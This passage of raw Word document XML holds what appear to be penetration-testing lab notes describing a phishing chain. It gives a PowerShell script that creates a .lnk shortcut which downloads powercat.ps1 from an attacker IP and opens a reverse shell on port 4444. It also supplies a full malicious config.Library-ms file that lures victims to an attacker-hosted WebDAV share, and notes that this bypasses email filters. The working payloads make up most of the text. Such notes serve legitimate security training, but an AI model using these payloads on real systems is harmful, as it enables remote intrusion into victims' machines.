        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save it using any name, like "test"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3454400" cy="2768600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="318" name="image309.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image309.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId811"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3454400" cy="276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6AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then via a terminal, get it into our kali and specifically into our webdav directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-smbserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put this file (and all the other files) inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/webdav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to make a .lnk file using powershell if you don't have access to RDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$WshShell = New-Object -COMObject WScript.Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initialize object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Shortcut = $WshShell.CreateShortcut("</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\offsec\test2.lnk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells it where to put the shortcut</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We called it test2.lnk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Shortcut.TargetPath = "powershell.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells it to run powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Shortcut.Arguments = "-c IEX(New-Object System.Net.WebClient).DownloadString('</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.45.232:8000/powercat.ps1'); powercat -c 192.168.45.232 -p 4444 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e powershell"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the argument that will passed into powershell.exe to be run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$Shortcut.Save()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This saves the shortcut and it will appear where you put it now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now export it using impacket-smbserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copy test2.lnk \\192.168.45.232\share\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside of webdav directory, create a malicious file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config.Library-ms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSIDE of webdav directory. Make sure to replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.45.232 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with your own IP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config.Library-ms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is a Windows Library file that tricks the victim into connectiong to the remote WebDAV share hosted by the attacker (you). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When opened, this file loads content from your Kali box over HTTP, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allowing you to bypass email filters and attachments restrictions by making</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the victim pull additional malicious files (like the reverse shell .lnk shortcut) from your WebDAV</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> share without directly attaching them in the email.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1476"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, when they click on this file, a file explorer page will pop up, and they will connect to our WebDAV server we are hosting on port 80, which has the malicious shortcut that sends reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026BF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C0">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C1">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;name&gt;@windows.storage.dll,-34582&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;version&gt;6&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;isLibraryPinned&gt;true&lt;/isLibraryPinned&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iconReference&gt;imageres.dll,-1003&lt;/iconReference&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;templateInfo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;folderType&gt;{7d49d726-3c21-4f05-99aa-fdc2c9474656}&lt;/folderType&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C8">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/templateInfo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026C9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;searchConnectorDescriptionList&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;searchConnectorDescription&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;isDefaultSaveLocation&gt;true&lt;/isDefaultSaveLocation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;isSupported&gt;false&lt;/isSupported&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CD">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;simpleLocation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CE">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;url&gt;http://192.168.45.232:80&lt;/url&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026CF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/simpleLocation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D0">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/searchConnectorDescription&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D1">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/searchConnectorDescriptionList&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/libraryDescription&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
